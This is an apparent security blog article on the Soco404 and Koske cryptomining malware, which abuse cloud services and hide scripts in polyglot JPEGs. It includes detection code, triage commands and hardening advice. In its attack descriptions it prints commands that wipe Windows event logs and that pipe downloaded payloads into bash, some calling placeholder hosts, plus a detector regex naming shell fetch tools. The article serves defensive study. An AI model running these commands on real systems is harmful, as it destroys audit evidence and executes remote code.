Cloud Security Breakdown: How Koske Malware Hides in JPEGs to Steal Compute Power
New cross-platform malware strains abuse PostgreSQL, Tomcat, JupyterLab, and Confluence to hijack compute power for cryptocurrency mining—leaving cloud workloads vulnerable and detection difficult.
🧨 Introduction: Clouds Turning into Crypto Mines
In what researchers have described as among the most technically advanced cloud attacks of 2025, threat actors have unleashed Soco404 and Koske, two malware families purpose-built to exploit cloud service misconfigurations, evade traditional detection, and turn Linux and Windows servers into covert cryptocurrency miners.
This incident marks a new chapter in cloud threats: cloud-native, largely fileless, cross-platform malware that blends in with legitimate activity, runs in memory, and slips past signature-based antivirus tools.
🧬 Attack Flow: Soco404 and Koske Campaigns Visualized
Soco404 Malware Attack Chain (Linux + Windows)
Koske Malware Flow (Polyglot Image Payload)
🧪 Technical Analysis: How the Malware Works
⚙️ Soco404 (Linux & Windows)
- Linux Payload:
  - Delivered via a shell dropper script fetched from disguised Google Sites pages (404.html).
  - Installs a Monero-compatible miner.
  - Evades detection using:
    - Process masquerading (`[kthreadd]`, `systemd`, etc.)
    - Cleaning `~/.bash_history`, `/var/log/wtmp`, and cron jobs
    - Killing competing miners with `pkill` or `killall`
- Windows Payload:
  - Dropper installs `WinRing0.sys` (the kernel driver also bundled with XMRig) to escalate to SYSTEM privileges.
  - Deletes itself (`cmd /c del %~f0`) post-execution to avoid forensic discovery.
  - Disables event logging and wipes the existing logs:

```cmd
sc stop EventLog
del /f /q %SystemRoot%\System32\winevt\Logs\*
```
⚙️ Koske (Advanced & Fileless)
- Polyglot JPEG Payloads:
  - A valid JPEG with a shell script appended after the image data.
  - Bypasses image-aware scanners because the file parses as a legitimate picture.
  - Delivered through a download-and-pipe one-liner of this shape (the line offset is chosen by the attacker to land on the appended script):

```bash
curl -o panda.jpg http://malicious[.]site/panda.jpg
# skip the image bytes and feed the appended script to the shell
tail -n +100 panda.jpg | bash
```
- Cryptocurrencies Mined:
  - Includes Monero, Ravencoin, Zano, Nexa, and 15+ others, using dynamic payloads optimized for CPU/GPU.
- Fileless Execution:
  - Extracted payloads run in memory rather than being dropped as separate executables, so file scanners and hash-based detections miss them; behaviour-based EDR can still catch the resulting CPU and network activity.
  - Memory-resident miners built with Go and Rust.
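The `file` command is not a reliable polyglot check, because it reports only the leading JPEG header. The following is an added example (not code from the Koske report or from Aqua Security) of a detector that walks the JPEG segment structure to find the real End-Of-Image marker, then inspects whatever trails it for shell-script indicators. The sample images, the indicator list and the `example.invalid` URL are constructed for the demonstration.

```python
"""Detect JPEG/shell polyglots: a structurally valid JPEG with a script appended
after the End-Of-Image (EOI) marker. Added example, not the Koske authors' code."""
import re
import sys
from typing import Optional

SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
STANDALONE = {0x01, *range(0xD0, 0xD8)}      # TEM and RST0-7 carry no length field
# Constructed indicator list; tune for your environment
SCRIPT_HINTS = re.compile(rb"#!/|\bbash\b|\bcurl\b|\bwget\b|\beval\b|\$\(|\bchmod\b|\bnohup\b")

def jpeg_eoi_offset(data: bytes) -> Optional[int]:
    """Return the offset just past the EOI marker, or None if not a parseable JPEG."""
    if len(data) < 4 or data[0] != 0xFF or data[1] != SOI:
        return None
    pos = 2
    while pos < len(data):
        if data[pos] != 0xFF:
            return None                         # a marker must start here
        while pos < len(data) and data[pos] == 0xFF:
            pos += 1                            # 0xFF fill bytes may precede a marker
        if pos >= len(data):
            return None
        marker = data[pos]
        pos += 1
        if marker == EOI:
            return pos
        if marker in STANDALONE:
            continue
        if pos + 2 > len(data):
            return None
        seglen = int.from_bytes(data[pos:pos + 2], "big")
        if seglen < 2:
            return None
        pos += seglen                           # length includes its own two bytes
        if marker == SOS:
            # Entropy-coded data follows. Inside it, 0xFF is always followed by 0x00
            # (byte stuffing), an RSTn marker, or another 0xFF fill byte, so the first
            # 0xFF followed by anything else is the next real marker.
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt not in (0x00, 0xFF) and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    return None

def inspect_jpeg(data: bytes) -> dict:
    """Is it a JPEG, how many bytes trail the image, and do they look like a script?"""
    end = jpeg_eoi_offset(data)
    if end is None:
        return {"valid_jpeg": False, "trailer_bytes": 0, "script_like": False}
    trailer = data[end:]
    return {"valid_jpeg": True, "trailer_bytes": len(trailer),
            "script_like": bool(SCRIPT_HINTS.search(trailer))}

def build_minimal_jpeg() -> bytes:
    """Constructed minimal JPEG: SOI, APP0/JFIF, SOS, a little scan data that
    exercises byte stuffing and an RST0 marker, then EOI. Structurally valid,
    not a decodable picture."""
    app0 = b"\xff\xe0" + (16).to_bytes(2, "big") + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + (8).to_bytes(2, "big") + b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\x34\xff\x00\x56\xff\xd0\x78\x9a"
    return b"\xff\xd8" + app0 + sos + scan + b"\xff\xd9"

CLEAN_JPEG = build_minimal_jpeg()
# Constructed Koske-style trailer; the URL is a placeholder, not an indicator
POLYGLOT_JPEG = CLEAN_JPEG + b"\n#!/bin/bash\ncurl -s http://example.invalid/x.sh | bash\n"
PADDED_JPEG = CLEAN_JPEG + b"\x00" * 64     # benign trailing padding, no script text

if __name__ == "__main__":
    # Usage: python polyglot_check.py /var/www/uploads/*.jpg
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, inspect_jpeg(fh.read()))
```

Trailing bytes alone are not proof of compromise (some cameras and multi-picture formats append data after EOI), which is why the result separates `trailer_bytes` from `script_like`; alert on the latter and review the former.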
🔎 Detection & Defense: Commands to Spot Soco404 and Koske
🔍 SOC Alerts to Look For:
```bash
# Check for high CPU processes not tied to legitimate services
ps aux --sort=-%cpu | head -5

# Look for processes masquerading as kernel threads: real kernel threads hang
# off kthreadd (PPID 2, kthreadd itself is PID 2), so a kernel-style name or a
# bracketed argv[0] on any other parent is suspicious
ps -eo pid,ppid,comm,args | awk '$1!=2 && $2!=2 && ($3 ~ /kthreadd|kworker|ksoftirqd/ || $4 ~ /^\[/)'

# Fake "systemd" processes: legitimate ones resolve to /usr/lib/systemd/systemd
# or /lib/systemd/systemd
for p in $(pgrep -x systemd); do echo "$p $(readlink /proc/$p/exe)"; done

# Check scheduled tasks (Linux)
crontab -l
ls -l /etc/cron.*/*

# Audit for polyglot JPEGs. `file` only reports the leading JPEG header, so
# look for shell text in the tail of the file instead
for f in *.jpg; do tail -c 16384 "$f" | grep -aqE '^#!/bin/(ba)?sh|\bbash\b|\bcurl\b' && echo "$f: trailing shell text"; done
```
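The one-liners above are quick triage; a SOC usually wants the same logic as a reusable check. The following is an added example (not from the Soco404 or Koske reports) that classifies process records the way the `ps`/`readlink` commands do: a kernel-thread name or bracketed argv[0] on a process that is not a child of kthreadd, a `systemd` that does not resolve to the systemd binary, or an executable living under a world-writable path or already deleted. On a Linux host `collect_procs()` reads `/proc` live; the `SAMPLE_PROCS` records are constructed so the logic also runs offline.

```python
"""Flag processes masquerading as kernel threads or core daemons.
Added example; the process records in SAMPLE_PROCS are constructed."""
import os
import re
from dataclasses import dataclass
from typing import Optional

KTHREADD_PID = 2
KERNEL_NAME = re.compile(r"^\[?(kthreadd|kworker|ksoftirqd|migration|kswapd|rcu_)")
SUSPICIOUS_EXE_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/", "/run/user/")

@dataclass
class Proc:
    pid: int
    ppid: int
    comm: str            # contents of /proc/PID/comm
    cmdline: str         # /proc/PID/cmdline with NULs replaced by spaces
    exe: Optional[str]   # readlink(/proc/PID/exe); None for true kernel threads

def is_kernel_thread(p: Proc) -> bool:
    """Real kernel threads are PID 2 or children of PID 2 and have no executable."""
    return p.exe is None and (p.pid == KTHREADD_PID or p.ppid == KTHREADD_PID)

def classify(p: Proc) -> Optional[str]:
    """Return a reason if the process looks like masquerading, else None."""
    looks_kernel = bool(KERNEL_NAME.search(p.comm)) or p.cmdline.startswith("[")
    if looks_kernel and not is_kernel_thread(p):
        return "kernel-thread name on a user-space process"
    if p.comm == "systemd" and p.exe and not p.exe.endswith("/systemd/systemd"):
        return f"systemd name but exe is {p.exe}"
    if p.exe and p.exe.endswith(" (deleted)"):
        return "running from a deleted executable"
    if p.exe and p.exe.startswith(SUSPICIOUS_EXE_DIRS):
        return f"executable under world-writable path {p.exe}"
    return None

def scan(procs) -> dict:
    """Map PID -> reason for every flagged process."""
    return {p.pid: r for p in procs if (r := classify(p))}

def collect_procs(proc_root: str = "/proc") -> list:
    """Read live process records from /proc (Linux only). Run as root: without
    permission readlink(exe) fails and the process is treated as having no exe."""
    procs = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        base = os.path.join(proc_root, entry)
        try:
            with open(os.path.join(base, "stat")) as fh:
                stat = fh.read()
            with open(os.path.join(base, "comm")) as fh:
                comm = fh.read().strip()
            with open(os.path.join(base, "cmdline"), "rb") as fh:
                cmdline = fh.read().replace(b"\0", b" ").decode(errors="replace").strip()
            ppid = int(stat.rsplit(")", 1)[1].split()[1])   # field after state
            try:
                exe = os.readlink(os.path.join(base, "exe"))
            except OSError:
                exe = None
        except (OSError, ValueError):
            continue                                        # process exited mid-read
        procs.append(Proc(int(entry), ppid, comm, cmdline, exe))
    return procs

# Constructed records modelled on the behaviours described in this article
SAMPLE_PROCS = [
    Proc(2, 0, "kthreadd", "", None),                                   # real kthreadd
    Proc(15, 2, "kworker/0:1", "", None),                               # real kernel worker
    Proc(1, 0, "systemd", "/sbin/init", "/usr/lib/systemd/systemd"),    # real init
    Proc(800, 1, "sshd", "/usr/sbin/sshd -D", "/usr/sbin/sshd"),        # ordinary daemon
    Proc(4242, 1, "kthreadd", "[kthreadd]", "/tmp/.x/kthreadd"),        # Soco404-style masquerade
    Proc(4300, 1, "systemd", "systemd", "/dev/shm/systemd"),            # fake systemd
    Proc(4311, 4242, "xmrig", "xmrig -o pool:3333", "/var/tmp/x (deleted)"),
]

if __name__ == "__main__":
    procs = collect_procs() if os.path.isdir("/proc") else SAMPLE_PROCS
    for pid, reason in sorted(scan(procs).items()):
        print(f"PID {pid}: {reason}")
```

Feed the flagged PIDs into the CPU and cron checks above; a masquerading name by itself is the lead, the mining pool connection and persistence are the confirmation.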
🧰 Recommended Countermeasures:
- Enforce hardened configurations:
  - PostgreSQL: bind only to trusted interfaces, restrict `pg_hba.conf` to known networks, and require password authentication (`scram-sha-256`) instead of `trust`.
  - JupyterLab: require token or OAuth login, never expose it to the internet.
  - Tomcat: disable or remove the manager app on production instances.
  - Apache/Confluence: restrict admin panels to internal IPs.
- Enable cloud-level anomaly detection:
  - AWS CloudTrail, GCP Audit Logs, and Azure Monitor.
  - Trigger alerts on abnormal spikes in CPU or network egress.
- Log tampering detection:
  - Monitor `auditd`, `syslog-ng`, and file hashes with Tripwire or Wazuh; alert when `~/.bash_history`, `/var/log/wtmp`, or the Windows Event Log service is cleared or stopped.
🌍 Human & Business Impact
The financial and operational impact is severe:
- 💸 Budget Drain: Stolen compute power = massive cloud bills.
- 🧯Incident Recovery: Systems need to be reimaged and audited.
- 🎯 Trust Erosion: Stakeholders lose confidence when cloud platforms are abused.
With Soco404 even appearing on Korean transport sites and Koske exploiting academic servers, this threat is not limited to tech firms—it affects education, logistics, and public infrastructure.
🧠 Educational Insight: Why This Matters
These campaigns offer a masterclass in attacker innovation:
- Cross-platform mining
- Process obfuscation
- Log evasion
- Memory-only execution
- Use of AI (LLMs) to generate code (Koske shows signs of AI-assisted scripting)
They emphasize the urgency of modern cloud security hygiene, such as threat modeling, zero-trust networking, and behavior-based EDR.
📢 Expert Quote
“This is a wake-up call for every DevOps and cloud security team. Malware like Koske isn’t just clever—it’s invisible. We must stop relying on legacy antivirus and start monitoring behavior, logs, and access patterns in real time,”
— Assaf Morag, Lead Threat Analyst, Aqua Security